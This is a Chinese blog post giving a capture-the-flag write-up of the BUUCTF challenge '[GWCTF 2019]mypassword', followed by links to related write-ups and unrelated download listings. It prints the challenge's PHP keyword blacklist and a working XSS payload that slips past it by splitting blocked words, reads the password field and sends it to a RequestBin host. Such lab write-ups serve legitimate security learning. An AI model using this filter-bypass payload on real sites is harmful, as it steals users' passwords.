145,【5】 buuctf web [GWCTF 2019]mypassword

于 2025-02-15 21:02:19 发布
阅读量406 收藏 4
点赞数 4
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_87039650/article/details/145650400
版权

进入靶场

   

修改了url后才到了注册页面

注测后再登录

查看源码

都点进去看看

 有个反馈页面

再查看源码

 又有收获

// 检查$feedback是否为数组
if (is_array($feedback)) {
    // 如果是数组,弹出提示框提示反馈不合法
    echo "<script>alert('反馈不合法');</script>";
    // 返回false,表示反馈不符合要求
    return false;
}
// 定义一个黑名单数组,包含一些不允许在反馈中出现的关键字和特殊字符
$blacklist = ['_', '\'', '&', '\\', '#', '%', 'input','script', 'iframe', 'host', 'onload', 'onerror','srcdoc', 'location','svg', 'form', 'img','src', 'getElement', 'document', 'cookie'];
// 遍历黑名单数组
foreach ($blacklist as $val) {
    // 进入循环,不断检查和替换
    while (true) {
        // 不区分大小写地检查$feedback中是否包含当前黑名单中的值
        if (stripos($feedback, $val)!== false) {
            // 如果包含,不区分大小写地将其从$feedback中替换为空字符串
            $feedback = str_ireplace($val, "", $feedback);
        } else {
            // 如果不包含,跳出当前循环
            break;
        }
    }
}

用到下面网站

RequestBin — Collect, inspect and debug HTTP requests and webhooks

<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
    var psw = docucookiement.getcookieElementsByName("password")[0].value;
    docucookiement.locacookietion="http://http.requestbin.buuoj.cn/1a5ujib1/?a="+psw;
</scrcookieipt>

 最后在网站上可以得到flag

rzydal
关注
自建XSS平台与BUUCTF[GWCTF 2019]mypassword
qq_41755084的博客
08-09 479
从这里创建网站,将xss平台文件拷贝到phpstudy平台安装目录的www目录下,然后在根目录里设定为xss平台文件所在的目录。这里就需要后台机器人先在两个输入框里输入账号密码,然后把这两个值存入cookie,然后读取其中的一个值,这个利用条件我感觉有点苛刻,但是不管,先试试再说。接下来需要将本地的xss平台服务映射到有公网ip的服务器上,这样靶机访问公网ip的服务器时就相当于访问本地的xss平台,完成攻击目的。启动后,访问目标服务器的7500端口,输入展示板的账号密码,应该就可以看到frp服务的展板了。
[BUUCTF][GWCTF 2019]mypassword
m0_52587327的博客
04-26 357
文章目录知识点解题过程学习参考 知识点 csrf requestbin使用(外带数据,即命令注入无回显时如何得到执行结果) 解题过程 注册登录 这里加载了一个js文件 payload: 60d487b4-04d2-4e33-9aad-fbe0264c5ac6.node3.buuoj.cn**/js/login.js** 得到一串js代码 if (document.cookie && document.cookie != '') { var cookies = document.coo
BUUCTF--[GWCTF 2019]mypassword
qq_46263951的博客
07-26 774
<!-- if(is_array($feedback)){ echo "<script>alert('反馈不合法');</script>"; return false; } $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onlo...
BUU [GWCTF 2019]mypassword
Jay17的博客
02-25 532
BUU [GWCTF 2019]mypassword
BUUCTF__[GWCTF 2019]mypassword_题解
风过江南乱的博客
04-29 1000
BUUCTF__[GWCTF 2019]mypassword_题解 XSS获取admin cookie
[GWCTF 2019]mypassword
shinygod的博客
09-18 521
知识点:xss
BUUCTF:[GWCTF 2019]mypassword
末初的CSDN博客
04-06 2189
注册登录 这里加载了一个js文件 60d487b4-04d2-4e33-9aad-fbe0264c5ac6.node3.buuoj.cn/js/login.js if (document.cookie && document.cookie != '') { var cookies = document.cookie.split('; '); var cookie = {};...
[GWCTF 2019]mypassword-做题记录
cjdgg的博客
03-13 447
[GWCTF 2019]mypassword-做题思路学习 这题给了个朴实无华的登陆界面,有注册登录界面那肯定得试试sql注入,很遗憾没有试出来。 那就找找源代码看看有没有有价值的东西 只发现加载了一个login.gs,emem还是没发现有什么能用的,没办法那就注册一个号登录进去看看吧 登录进去主页面会有你的用户名可控,我就想会不会有啥ssti或者搞些标签进去,结果可想而知,<,>,{,},’,"这些符号应该被过滤了,那这题就不是这么玩的 去看看别的页面,feedback.php这里应
[GWCTF 2019]mypassword XSS
qq_54929891的博客
06-22 439
放假
MyPassword
04-08
MyPassword的压缩包文件中,我们看到只有一个名为"MyPassword"的文件,这通常意味着它可能是一个自包含的应用程序,包含了所有必要的运行库和资源。用户只需双击这个文件,就能启动密码管理器,开始管理和保护自己...
MyPassword:为您生成和管理密码的 Android 应用
06-29
在技术实现上,MyPassword 很可能基于Java语言开发,因为标签中明确提到了"Java"。Java是Android应用开发的主流语言,具有跨平台性、稳定性和丰富的库支持。开发者可能利用了Android SDK中的各种组件和服务,如...
标准商务日语第六课ppt
03-18
标准商务日语第六课ppt
康复工程中模糊化助力交互控制系统的运动学与控制设计(可复现,有问题请联系博主)
03-18
内容概要:本文主要探讨下肢康复机器人中的模糊化助力交互控制系统设计,适用于已经具备部分自主驱动力的肢体运动障碍患者的康复治疗。康复进程分为主动和被动两种,前者比后者更能有效促进神经重建。对于康复机器人而言,缺乏精确的动力学模型意味着难以进行精确控制。文章提出一种结合重力补偿、模糊控制与阻抗控制的方法,实现精确的交互控制,提升康复效果,避免潜在伤害风险。运动学模型利用四根牵引绳索控制大腿以及两根控制小腿来模拟正常的行走步态。 适用人群:康复医学领域的研究人员,机械电子工程师和技术开发者等。 使用场景及目标:用于下肢受伤患者恢复训练时所使用的设备设计。具体场景如医院理疗科或专门康复中心;旨在改善患者康复质量,并尽可能避免因误操作造成的二次伤害或其他并发症。同时也可以作为一种先进的康复治疗方法推向市场供医疗单位采购应用。 其他说明:为了更好地应对不同个体间的差异问题,本研究所设计的数据采集系统还可以根据每个病患的具体情况实时调整各项参数;模糊逻辑推理系统采用了经典的Mamdani模型,结合实际测量数据构建了精确的隶属度函数;此外,为了避免剧烈肌肉收缩或异常外力引起的安全隐患,在硬件层面上引入
毕业设计源码-jspm基于Java的高校成绩报送系统的设计与实现98d46-项目实战.zip
03-18
本项目是基于Java技术构建的高校成绩报送系统,采用JSP动态页面技术实现前后端交互,结合MySQL数据库完成数据存储与管理。系统主要包含学生信息管理、教师成绩录入、成绩审核发布、班级排名统计等核心功能模块,支持多角色权限控制与数据加密传输135。在框架设计上,采用经典的MVC架构模式,通过Servlet处理业务逻辑,JavaBean封装数据模型,实现代码分层管理与高效复用78。开发此项目的目的是为高校教务管理提供自动化解决方案,解决传统成绩报送中手工操作效率低、数据易出错等问题,同时通过信息化手段提升成绩管理的透明度与可追溯性6。系统界面采用响应式设计,兼容PC端与移动端访问,教师可通过系统批量导入成绩数据,学生可实时查询个人成绩及班级排名,管理员则能进行用户权限分配与数据备份等操作35。毕设项目源码常年开发定制更新,希望对需要的同学有帮助。
易乐播播放器性能测试测试报告
03-18
针对易乐播播放器撰写的测试用例及其性能测试的测试报告
毕业设计源码-jspSSM212的班级同学录聚会报名网站-项目实战.zip
03-18
本项目是基于SSM框架与JSP技术实现的班级同学录聚会报名系统,旨在构建一个数字化平台以增强校友间的联系与互动。系统采用Spring+SpringMVC+MyBatis后端架构,结合JSP动态页面技术,实现了用户注册登录、班级成员信息管理、聚会活动发布与报名、留言板交流、相册共享等核心功能123。管理员端支持用户权限审核、活动数据统计及系统维护,用户端则提供个性化资料编辑、班级通讯录查询和活动参与入口。数据库采用MySQL存储用户信息、活动记录等结构化数据,通过Maven构建项目工程并部署于Tomcat服务器23。开发过程中重点实践了前后端分离模式下的接口设计与数据交互,解决了传统纸质同学录信息更新滞后、交互性差的问题,为毕业生提供便捷的线上联络渠道14。毕设项目源码常年开发定制更新,希望对需要的同学有帮助。
基于深度学习的图像隐写分析系统python源码+答辩PPT+设计报告(可作毕设).zip
03-18
基于深度学习的图像隐写分析系统python源码+答辩PPT+设计报告(可作毕设).zip ,拿到了95分。 主要任务为实现图像隐写分析以及隐写去除,其中隐写分析采用SRNet网络模型,隐写去除采用DDSP网络模型。 ​ 项目中有4个文件夹,分别为: 0.SRNet、1.GUI、2.DDSP、3.SRNet 其中0.SRNet为图像隐写分析,使用Jessica教授的官方源码,框架为tensorflow;1.GUI为隐写嵌入以及隐写分析可视化演示系统,由PyQ5实现;2.DDSP为图像隐写去除,pytorch实现;3.SRNet为图像隐写分析,pytorch实现。其中自己复现的SRNet网络模型其性能弱于官方代码。 隐写去除 ​ 隐写去除采用的是DDSP模型,DDSP模型本质上是一个GAN网络,和SRGAN网络的结构非常类似,只不过DDSP网络的Generator是一个自编码器Autoencoder,在训练模型的过程中需要先训练自编码器,当自编码器收敛之后,再代入到GAN网络框架中进行对抗训练,GAN网络的鉴别器Discriminator是一个普通的卷积神经网络,主要是判别输入的图片
毕业设计源码-jspSSM274的vue酒店管理系统-项目实战.zip
最新发布
03-18
本项目是基于SSM框架与Vue.js技术栈开发的酒店管理系统,旨在通过前后端分离架构实现酒店业务的数字化管理。系统采用Spring、SpringMVC、MyBatis构建后端服务,结合Vue.js与Element UI组件库实现动态交互界面,支持用户注册登录、客房信息查询、在线预订、订单管理等功能模块136。
WebServer实现多数据库连接方案及实用类
在现代信息技术领域,Web服务器(WebServer)与数据库的交互是构建动态网站或网络服务不可或缺的一部分。当我们讨论Web服务器与各种数据库的连接时,我们通常是在探讨后端开发中如何通过Web服务器进行数据库操作以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值